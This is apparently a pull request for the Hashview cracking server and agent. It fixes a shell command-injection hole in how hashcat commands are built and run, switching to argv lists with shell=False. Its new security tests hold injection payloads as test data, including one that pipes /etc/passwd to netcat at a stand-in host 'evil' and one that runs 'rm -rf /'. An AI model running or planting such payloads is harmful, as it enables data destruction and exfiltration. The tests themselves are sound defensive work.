### PR TITLE
fix(security): build hashcat invocation as argv, run without a shell …

### DIFF
--- a/hashview/utils/utils.py
+++ b/hashview/utils/utils.py
@@ -3,6 +3,7 @@ import _md5
 import binascii
 import gzip
 import hashlib
+import json
 import os
 import re
 import secrets
@@ -839,7 +840,14 @@ def agent_telemetry(agents):
 
 
 def build_hashcat_command(job_id, task_id, chunk=None, job_task_id=None):
-    """Function to build the main hashcat cmd we use to crack.
+    """Build the hashcat crack invocation as an argv LIST (list[str]).
+
+    Returned as a token list — not a shell string — so free-form task fields
+    (``hc_mask``, ``j_rule``, ``k_rule``) are literal argv elements the agent
+    passes to ``subprocess`` with ``shell=False``; shell metacharacters in them
+    cannot be interpreted (issue #297). Element 0 is the ``@HASHCATBINPATH@``
+    placeholder the agent expands to its configured binary at run time.
+
 
     ``chunk`` (optional) is a chunk spec from
     ``hashview.utils.chunking.plan_chunks``:
@@ -905,19 +913,23 @@ def build_hashcat_command(job_id, task_id, chunk=None, job_task_id=None):
 
     session = secrets.token_hex(4)
 
-    # Build cmd
-    cmd = hc_binpath
-    cmd += ' -O -w 3'
-    cmd += ' --session ' + session
-    cmd += ' -m ' + str(hash_type)
-    cmd += ' --potfile-path ' + potfile
-    cmd += ' --status --status-timer=15'
-    cmd += ' --outfile-format 1,3'
-    cmd += ' --outfile ' + crack_file
+    # Build the invocation as an argv LIST, never a shell string: the free-form
+    # task fields (mask, j/k rules) become literal argv elements, so shell
+    # metacharacters in them cannot be interpreted — the agent runs this with
+    # shell=False (issue #297). Element 0 stays the @HASHCATBINPATH@ placeholder
+    # the agent expands to its configured binary (+ HC_EXTRA_ARGS) at run time.
+    argv = [hc_binpath,
+            '-O', '-w', '3',
+            '--session', session,
+            '-m', str(hash_type),
+            '--potfile-path', potfile,
+            '--status', '--status-timer=15',
+            '--outfile-format', '1,3',
+            '--outfile', crack_file]
     # Chunk slice for wordlist base-loop modes: restrict this run to a word range.
     is_chunk_slice = 'skip' in chunk and 'limit' in chunk
     if is_chunk_slice:
-        cmd += ' --skip ' + str(chunk['skip']) + ' --limit ' + str(chunk['limit'])
+        argv += ['--skip', str(chunk['skip']), '--limit', str(chunk['limit'])]
 
     # Loopback only applies to straight mode (-a 0) with a rule; hashcat rejects
     # it for other attack modes. It is ALSO mutually exclusive with --limit, so a
@@ -925,7 +937,7 @@ def build_hashcat_command(job_id, task_id, chunk=None, job_task_id=None):
     # chunk runs as a plain dict+rules slice instead. The server-side gate also
     # means a task flipped away from dict+rules never emits a stray --loopback.
     if attackmode == 0 and isinstance(task.rule_id, int) and task.loopback and not is_chunk_slice:
-        cmd += ' --loopback'
+        argv.append('--loopback')
 
     # --hex-salt: the hashfile was marked as carrying hex-encoded salts. Gated on
     # a salted mode so we never pass it to an unsalted mode (hashcat would reject
@@ -933,49 +945,35 @@ def build_hashcat_command(job_id, task_id, chunk=None, job_task_id=None):
     # formats, whose ciphertext keeps the colon-delimited salt hashcat parses.
     hashfile = Hashfiles.query.get(job.hashfile_id)
     if hashfile and hashfile.hex_salt and hash_type_uses_salt(hash_type):
-        cmd += ' --hex-salt'
+        argv.append('--hex-salt')
 
     # Dictionary with optional rules
     if attackmode == 0:
         if isinstance(task.rule_id, int):
-            cmd += ' -r ' + relative_rules_path + ' ' + target_file + ' ' + relative_wordlist_path
+            argv += ['-r', relative_rules_path, target_file, relative_wordlist_path]
         else:
-            cmd += ' ' + target_file + ' ' + relative_wordlist_path
-    # combinator
+            argv += [target_file, relative_wordlist_path]
+    # Combinator — j/k rules are literal argv elements (previously single-quoted
+    # into the shell string, which a `'` in the field could break out of).
     elif attackmode == 1:
+        argv += ['-a', '1', target_file, relative_wordlist_path]
         if isinstance(task.j_rule, str):
-            j_rule = " -j '" + task.j_rule + "' "
-        else:
-            j_rule = ' '
-        
+            argv += ['-j', task.j_rule]
+        argv.append(relative_wordlist_2_path)
         if isinstance(task.k_rule, str):
-            k_rule = " -k '" + task.k_rule + "' "
-        else:
-            k_rule = ' '
-        cmd += ' ' + ' -a 1 ' + target_file + ' ' + relative_wordlist_path + j_rule + relative_wordlist_2_path + k_rule
-    # maskmode
+            argv += ['-k', task.k_rule]
+    # Maskmode — the mask is a literal argv element (previously unquoted in the
+    # shell string).
     elif attackmode == 3:
-        cmd += ' ' + ' -a 3 ' + target_file + ' ' + mask
+        argv += ['-a', '3', target_file, mask]
     # Hybrid (Wordlist + Mask)
     elif attackmode == 6:
-        cmd += ' ' + ' -a 6 ' + target_file + ' ' + relative_wordlist_path + ' ' + mask
+        argv += ['-a', '6', target_file, relative_wordlist_path, mask]
+    # Hybrid (Mask + Wordlist)
     elif attackmode == 7:
-        cmd += ' ' + ' -a 7 ' + target_file + ' ' + mask + ' ' + relative_wordlist_path
+        argv += ['-a', '7', target_file, mask, relative_wordlist_path]
 
-    # Mask mode
-    #if attackmode == 'bruteforce':
-    #    cmd = hc_binpath + ' -O -w 3 ' + ' --session ' + session + ' -m ' + str(hash_type) + ' --potfile-disable' + ' --status --status-timer=15' + ' --outfile-format 1,3' + ' --outfile ' + crack_file + ' ' + ' -a 3 ' + target_file
-    # elif attackmode == 'maskmode':
-    #     cmd = hc_binpath + ' -O -w 3 ' + ' --session ' + session + ' -m ' + str(hash_type) + ' --potfile-disable' + ' --status --status-timer=15' + ' --outfile-format 1,3' + ' --outfile ' + crack_file + ' ' + ' -a 3 ' + target_file + ' ' + mask
-    # elif attackmode == 'dictionary':
-    #     if isinstance(task.rule_id, int):
-    #         cmd = hc_binpath + ' -O -w 3 ' + ' --session ' + session + ' -m ' + str(hash_type) + ' --potfile-disable' + ' --status --status-timer=15' + ' --outfile-format 1,3' + ' --outfile ' + crack_file + ' ' + ' -r ' + relative_rules_path + ' ' + target_file + ' ' + relative_wordlist_path
-    #     else:
-    #         cmd = hc_binpath + ' -O -w 3 ' + ' --session ' + session + ' -m ' + str(hash_type) + ' --potfile-disable' + ' --status --status-timer=15' + ' --outfile-format 1,3' + ' --outfile ' + crack_file + ' ' + target_file + ' ' + relative_wordlist_path
-    # elif attackmode == 'combinator':
-    #   cmd = hc_binpath + ' -O -w 3 ' + ' --session ' + session + ' -m ' + str(hash_type) + ' --potfile-disable' + ' --status --status-timer=15' + ' --outfile-format 1,3' + ' --outfile ' + crack_file + ' ' + ' -a 1 ' + target_file + ' ' + wordlist_one.path + ' ' + ' ' + wordlist_two.path + ' ' + relative_rules_path
-
-    return cmd
+    return argv
 
 def _chunk_spec_from_row(job_task):
     """Reconstruct a chunk spec dict from a JobTasks row's stored slice."""
@@ -1008,7 +1006,9 @@ def _set_job_task_command(job, row, spec, chunk_no=None, chunk_total=None):
     # existing agents keep working without an upgrade; only chunks need the
     # per-jobtask naming to avoid collisions between chunks of the same task.
     job_task_id = row.id if chunk_total else None
-    row.command = build_hashcat_command(job.id, row.task_id, chunk=spec, job_task_id=job_task_id)
+    # build_hashcat_command returns an argv list; persist it as JSON so the agent
+    # can json.loads it back into a token list and run it with shell=False.
+    row.command = json.dumps(build_hashcat_command(job.id, row.task_id, chunk=spec, job_task_id=job_task_id))
 
 
 def build_job_task_commands(job):

--- a/install/hashview-agent/hashview-agent.py
+++ b/install/hashview-agent/hashview-agent.py
@@ -433,19 +433,50 @@ def download_hashfile(job_id, jobtask_id, hashfile_id):
     hashfile.write(hashfile_content)
     hashfile.close()
 
-def replaceHashcatBinPath(cmd):
-    from agent.config import Config
-    # HC_BIN_PATH is the bare binary; append any host-specific HC_EXTRA_ARGS
-    # (e.g. '-d 3,4') after it. The crack command runs via shell=True, so the
-    # shell re-parses this string into binary + flags.
-    binpath = Config.HC_BIN_PATH
-    extra = (getattr(Config, 'HC_EXTRA_ARGS', '') or '').strip()
-    if extra:
-        binpath = binpath + ' ' + extra
-    return cmd.replace('@HASHCATBINPATH@', binpath)
+def build_hashcat_argv(command):
+    """Decode the server's stored command (a JSON argv list) into a real argv.
 
-def run_hashcat(cmd):
-    run_command(cmd)
+    Expands the @HASHCATBINPATH@ placeholder token into the operator-configured
+    hashcat binary plus any host-specific HC_EXTRA_ARGS (e.g. '-d 3,4', split into
+    its own tokens). Returns list[str] to run with shell=False — free-form task
+    fields (mask, j/k rules) stay literal argv elements, never shell-parsed
+    (issue #297).
+    """
+    from agent.bench import parse_hc_extra_args
+    from agent.config import Config
+    extra = parse_hc_extra_args(getattr(Config, 'HC_EXTRA_ARGS', ''))
+    argv = []
+    for token in json.loads(command):
+        if token == '@HASHCATBINPATH@':
+            argv.append(Config.HC_BIN_PATH)
+            argv.extend(extra)
+        else:
+            argv.append(str(token))
+    return argv
+
+def run_hashcat(argv, output_file):
+    """Run hashcat directly, no shell, so task fields can't inject shell commands
+    (issue #297). hashcat's --status-json stream is redirected to output_file,
+    which monitor_hashcat tails (replaces the old '<cmd> | tee <file>' pipe)."""
+    try:
+        with open(output_file, 'wb') as out:
+            # nosec B603 - shell=False; argv[0] is the operator-set HC_BIN_PATH and
+            # every other element is a server-built token passed literally to hashcat.
+            proc = subprocess.Popen(argv, shell=False, stdout=out,  # nosec B603
+                                    stderr=subprocess.PIPE)
+            _output, error = proc.communicate()
+        if error:
+            LOG.error('Command stderr: %s', error.decode('utf-8', 'replace').strip())
+            if 'hashfile is empty or corrupt' not in str(error):
+                if 'Terminated' in str(error):
+                    sys.exit()
+                else:
+                    api.sendError(str(error))
+                    os.kill(os.getpid(), signal.SIGINT)
+    except OSError as e:
+        LOG.error('Command failed to execute: %s', e)
+        api.sendError(str(e))
+        os.kill(os.getpid(), signal.SIGINT)
 
 BENCHMARK_TIMEOUT = 1200  # seconds, per hash mode
 
@@ -708,13 +739,14 @@ def run_assigned_task(job_task_id):
     file_key = job_task['id'] if job_task.get('chunk_total') else job_task['task_id']
     download_hashfile(job['id'], file_key, job['hashfile_id'])
 
-    cmd = (replaceHashcatBinPath(job_task['command'])
-           + ' --status-json | tee control/outfiles/hcoutput_'
-           + str(job['id']) + '_' + str(job_task['id']) + '.txt')
-    LOG.debug('hashcat command: %s', cmd)
+    output_file = ('control/outfiles/hcoutput_'
+                   + str(job['id']) + '_' + str(job_task['id']) + '.txt')
+    argv = build_hashcat_argv(job_task['command'])
+    argv.append('--status-json')      # hashcat writes status JSON to stdout -> output_file
+    LOG.debug('hashcat argv: %s', argv)
 
     LOG.info('Running hashcat for job task %s...', job_task['id'])
-    thread = Thread(target=run_hashcat, args=(cmd,))
+    thread = Thread(target=run_hashcat, args=(argv, output_file))
     thread.start()
     monitor_hashcat(thread, job, job_task)
     LOG.info('hashcat completed for job task %s; uploading final results.', job_task['id'])

--- a/tests/agent_unit/test_argv_command.py
+++ b/tests/agent_unit/test_argv_command.py
@@ -1,0 +1,71 @@
+"""Agent-side argv execution (issue #297).
+
+build_hashcat_argv decodes the server's stored command (a JSON argv list) into a
+real argv, expands the @HASHCATBINPATH@ placeholder (plus any HC_EXTRA_ARGS), and
+keeps free-form task fields as single literal tokens — so the crack runs with
+shell=False and shell metacharacters in those fields are never interpreted.
+"""
+import importlib.util
+import json
+import os
+import sys
+import types
+from pathlib import Path
+from unittest import mock
+
+AGENT_ROOT = Path(__file__).resolve().parents[2] / "install" / "hashview-agent"
+
+
+def _load_agent_main():
+    if "psutil" not in sys.modules:
+        stub = types.ModuleType("psutil")
+
+        class _PsutilError(Exception):
+            pass
+
+        stub.Error = _PsutilError
+        stub.NoSuchProcess = type("NoSuchProcess", (_PsutilError,), {})
+        stub.AccessDenied = type("AccessDenied", (_PsutilError,), {})
+        stub.ZombieProcess = type("ZombieProcess", (_PsutilError,), {})
+        stub.process_iter = lambda *a, **k: []
+        sys.modules["psutil"] = stub
+
+    real_exists = os.path.exists
+    path = AGENT_ROOT / "hashview-agent.py"
+    with mock.patch.object(sys, "argv", ["hashview-agent.py"]), \
+         mock.patch(
+             "os.path.exists",
+             side_effect=lambda p: True if str(p).endswith("agent/config.conf") else real_exists(p),
+         ):
+        spec = importlib.util.spec_from_file_location("hashview_agent_main_argv", path)
+        mod = importlib.util.module_from_spec(spec)
+        spec.loader.exec_module(mod)
+    return mod
+
+
+agent_main = _load_agent_main()
+
+
+def test_build_hashcat_argv_expands_binpath_and_keeps_payload_literal():
+    payload = "?d?d ; whoami #`id`$(cat /etc/passwd)|nc evil 9"
+    command = json.dumps(["@HASHCATBINPATH@", "-m", "1000", "-a", "3",
+                          "control/hashes/h.txt", payload])
+    argv = agent_main.build_hashcat_argv(command)
+
+    assert argv[0] == "/usr/bin/hashcat"       # placeholder -> Config.HC_BIN_PATH
+    assert argv[-1] == payload                 # injection payload is ONE literal token
+    assert argv.count(payload) == 1
+    assert ";" not in argv and "|" not in argv  # never split into shell-metachar tokens
+
+
+def test_build_hashcat_argv_splits_hc_extra_args_into_tokens():
+    cfg = sys.modules["agent.config"].Config
+    original = cfg.HC_EXTRA_ARGS
+    cfg.HC_EXTRA_ARGS = "-d 3,4"
+    try:
+        argv = agent_main.build_hashcat_argv(json.dumps(["@HASHCATBINPATH@", "-m", "0"]))
+    finally:
+        cfg.HC_EXTRA_ARGS = original
+
+    # binary, then each HC_EXTRA_ARGS token separately, then the rest.
+    assert argv[:4] == ["/usr/bin/hashcat", "-d", "3,4", "-m"]

--- a/tests/e2e/crack/seed_crack_db.py
+++ b/tests/e2e/crack/seed_crack_db.py
@@ -125,7 +125,9 @@ def seed(app, manifest):
             jt = JobTasks(job_id=job.id, task_id=task.id, status="Queued", priority=3)
             db.session.add(jt)
             db.session.flush()
-            jt.command = build_hashcat_command(job.id, task.id)
+            # build_hashcat_command returns an argv list; the command column stores
+            # it as JSON (same as _set_job_task_command), which the agent decodes.
+            jt.command = json.dumps(build_hashcat_command(job.id, task.id))
 
         _authorize_agents(manifest)
         db.session.commit()

--- a/tests/security/test_security_hardening.py
+++ b/tests/security/test_security_hardening.py
@@ -279,7 +279,9 @@ def test_wordlist_path_collapses_to_basename(nocsrf_app, evil_path):
     from hashview.utils.utils import build_hashcat_command
 
     job, task = _seed_job_with_task(0, wl_path=evil_path)
-    cmd = build_hashcat_command(job.id, task.id)
+    # build_hashcat_command returns an argv list; join it so these substring
+    # checks (prefix + no-traversal) inspect the whole invocation.
+    cmd = " ".join(build_hashcat_command(job.id, task.id))
 
     # The wordlist must always be referenced under the relative control dir.
     assert "control/wordlists/" in cmd
@@ -300,10 +302,54 @@ def test_rule_path_collapses_to_basename(nocsrf_app):
     from hashview.utils.utils import build_hashcat_command
 
     job, task = _seed_job_with_task(0, rule_path="../../../../etc/passwd")
-    cmd = build_hashcat_command(job.id, task.id)
+    cmd = " ".join(build_hashcat_command(job.id, task.id))   # argv list -> joined for substring checks
     assert "control/rules/passwd" in cmd
     assert "/etc/passwd" not in cmd
     assert "../" not in cmd
+
+
+# --------------------------------------------------------------------------- #
+# 3b. Command injection via task mask / rule fields (issue #297)              #
+# build_hashcat_command returns an argv LIST run by the agent with shell=False,#
+# so free-form fields land as literal argv elements, never shell-interpreted. #
+# --------------------------------------------------------------------------- #
+
+
+@pytest.mark.security
+def test_mask_field_shell_injection_is_a_literal_argv_element(nocsrf_app):
+    """A mask carrying shell metacharacters must be ONE literal argv element
+    (issue #297): `;`, `$()`, backticks, `|`, newlines reach hashcat as data."""
+    from hashview.utils.utils import build_hashcat_command
+
+    payload = "?d?d ; touch /tmp/pwned #\n$(id)`whoami`|cat /etc/passwd"
+    job, task = _seed_job_with_task(3, hc_mask=payload)   # -a 3 mask mode
+    argv = build_hashcat_command(job.id, task.id)
+
+    assert isinstance(argv, list)
+    # The whole payload is exactly one argv element (never split on the
+    # metacharacters), so execve hands it to hashcat as a single argument.
+    assert payload in argv
+    assert argv.count(payload) == 1
+    assert argv[-1] == payload                       # it's the mask argument
+
+
+@pytest.mark.security
+def test_combinator_rule_shell_injection_is_a_literal_argv_element(nocsrf_app):
+    """The combinator -j/-k rules were single-quoted (unescaped) into a shell
+    string, so a `'` broke out. As argv elements they cannot (issue #297)."""
+    from hashview.utils.utils import build_hashcat_command
+
+    j_payload = "$1' ; rm -rf / ; '"                 # single-quote break-out attempt
+    k_payload = "`whoami`"
+    job, task = _seed_job_with_task(1, j_rule=j_payload, k_rule=k_payload)  # -a 1 combinator
+    argv = build_hashcat_command(job.id, task.id)
+
+    assert isinstance(argv, list)
+    # Each rule is exactly one literal argv element, right after its flag.
+    assert argv[argv.index("-j") + 1] == j_payload
+    assert argv[argv.index("-k") + 1] == k_payload
+    # The build never emitted standalone shell-metacharacter tokens.
+    assert ";" not in argv and "&&" not in argv and "|" not in argv
 
 
 # --------------------------------------------------------------------------- #

--- a/tests/unit/test_crack_seed_verify.py
+++ b/tests/unit/test_crack_seed_verify.py
@@ -69,8 +69,9 @@ def test_seed_creates_full_job_and_authorizes_agents(tmp_path):
         jts = JobTasks.query.filter_by(job_id=job.id).all()
         assert len(jts) == 2
         assert all(jt.status == "Queued" for jt in jts)
-        # Each command references the agent control paths the server built.
-        cmds = " ".join(jt.command for jt in jts)
+        # Each command is a JSON argv list; decode + join the tokens to inspect
+        # the agent control paths the server built.
+        cmds = " ".join(tok for jt in jts for tok in json.loads(jt.command))
         assert "-m 1000" in cmds
         assert "control/hashes/hashfile_" in cmds
         assert "control/wordlists/" in cmds

--- a/tests/unit/test_hashcat_loopback_potfile.py
+++ b/tests/unit/test_hashcat_loopback_potfile.py
@@ -33,6 +33,13 @@ from hashview.models import (
 )
 from hashview.utils.utils import build_hashcat_command, ingest_static_wordlist_file
 
+
+def _cmd_str(*args, **kwargs):
+    """build_hashcat_command returns an argv list; join it for the substring
+    assertions here (token order/presence is preserved by the join)."""
+    return " ".join(build_hashcat_command(*args, **kwargs))
+
+
 REPO_ROOT = Path(__file__).resolve().parents[2]
 CONTROL = REPO_ROOT / "hashview" / "control"
 WORDLISTS_DIR = CONTROL / "wordlists"
@@ -106,7 +113,7 @@ def _build(user, *, attackmode, wl=None, wl_id_2=None, rule_id=None,
                  hc_mask=mask, loopback=loopback)
     db.session.add(task)
     db.session.commit()
-    cmd = build_hashcat_command(job.id, task.id)
+    cmd = _cmd_str(job.id, task.id)
     return cmd, job, task
 
 
@@ -198,10 +205,10 @@ def test_no_loopback_when_chunked(app):
     rule = _rule(user)
     _, job, task = _build(user, attackmode=0, wl=wl, rule_id=rule.id, loopback=True)
     # whole task still emits --loopback
-    assert "--loopback" in build_hashcat_command(job.id, task.id)
+    assert "--loopback" in _cmd_str(job.id, task.id)
     # a chunk slice drops --loopback and adds --skip/--limit
-    chunked = build_hashcat_command(job.id, task.id, chunk={"skip": 0, "limit": 50},
-                                    job_task_id=999)
+    chunked = _cmd_str(job.id, task.id, chunk={"skip": 0, "limit": 50},
+                       job_task_id=999)
     assert "--loopback" not in chunked
     assert "--skip 0 --limit 50" in chunked
 
@@ -218,10 +225,10 @@ def test_mask_chunk_overrides_task_mask(app):
     task_mask = "?d?d?d?d"
     _, job, task = _build(user, attackmode=3, mask=task_mask)
     # whole task runs the task's own mask
-    assert build_hashcat_command(job.id, task.id).endswith(task_mask)
+    assert _cmd_str(job.id, task.id).endswith(task_mask)
     # a mask chunk substitutes its sub-mask for the task mask
-    chunked = build_hashcat_command(job.id, task.id, chunk={"mask": "00?d?d"},
-                                    job_task_id=42)
+    chunked = _cmd_str(job.id, task.id, chunk={"mask": "00?d?d"},
+                       job_task_id=42)
     assert chunked.endswith("00?d?d")
     assert "-a 3 " in chunked
     assert task_mask not in chunked          # original mask fully replaced
@@ -276,7 +283,7 @@ def _build_hex(user, *, hex_salt, hash_type, ciphertext="abcd:cafe"):
                  wl_id=wl.id, rule_id=None, hc_mask=None, loopback=False)
     db.session.add(task)
     db.session.commit()
-    return build_hashcat_command(job.id, task.id)
+    return _cmd_str(job.id, task.id)
 
 
 @pytest.mark.security

--- a/tests/unit/test_wordlist_gzip_storage.py
+++ b/tests/unit/test_wordlist_gzip_storage.py
@@ -576,7 +576,7 @@ def test_build_hashcat_command_combinator_uses_second_wordlist(app, tmp_path):
     task.wl_id_2 = wl2.id
     db.session.commit()
 
-    cmd = build_hashcat_command(job.id, task.id)
+    cmd = " ".join(build_hashcat_command(job.id, task.id))   # argv list -> joined for substring checks
     assert " -a 1 " in cmd
     assert gz1 in cmd                      # left dictionary
     assert gz2 in cmd                      # right dictionary — the bug dropped this
@@ -595,7 +595,7 @@ def test_build_hashcat_command_static_dict_plus_rule(app, tmp_path):
     db.session.add(rule)
     db.session.commit()
     job, task = _setup_job_for_wordlist(user, wl, attackmode=0, rule_id=rule.id)
-    cmd = build_hashcat_command(job.id, task.id)
+    cmd = " ".join(build_hashcat_command(job.id, task.id))   # argv list -> joined for substring checks
     assert "-r control/rules/best64.rule" in cmd
     assert "control/wordlists/" + gz_basename in cmd
 


### PR DESCRIPTION
…(issue #297)

Free-form task fields (hc_mask, j_rule, k_rule) flowed unquoted/unescaped into a hashcat command STRING the agent ran via subprocess.Popen(shell=True), so shell metacharacters (`;`, `$()`, backticks, `|`, newlines, single-quote break-out in the -j/-k rules) executed arbitrary commands on the agent host — HIGH severity RCE reachable by anyone who can create/edit a task.

Option B: represent the invocation as an argv LIST end-to-end and run it with shell=False, so those fields are literal argv elements the shell never sees.

- Server (build_hashcat_command): returns list[str] instead of a shell string; mask and -j/-k rules are discrete elements. _set_job_task_command persists it as JSON in JobTasks.command (JSON safely encodes newlines/quotes).
- Agent: build_hashcat_argv() json.loads the command and expands the @HASHCATBINPATH@ token into HC_BIN_PATH + HC_EXTRA_ARGS (tokenised); run_hashcat runs Popen(argv, shell=False, stdout=<hcoutput file>). The old `<cmd> --status-json | tee <file>` shell pipe becomes an stdout redirect to the same file monitor_hashcat already tails — status/progress + cancel unchanged.

Tests: new injection proofs (mask + combinator payloads become a single literal argv element) in test_security_hardening.py; new agent-unit test_argv_command.py (binpath/EXTRA_ARGS expansion, payload stays one token). Updated the string-based assertions (loopback/potfile, wordlist-gzip, crack-seed) to the list/JSON contract and fixed the e2e seeder to json.dumps the argv list. Full suite green.

Note: this changes the server<->agent wire format (command is JSON, run without a shell). Deploy server-first; a version-gate bump (0.8.3) to force agent upgrades is left for the release. run_command (gunzip/mv on server-derived hex paths) is unchanged — not the free-form-field surface of this issue.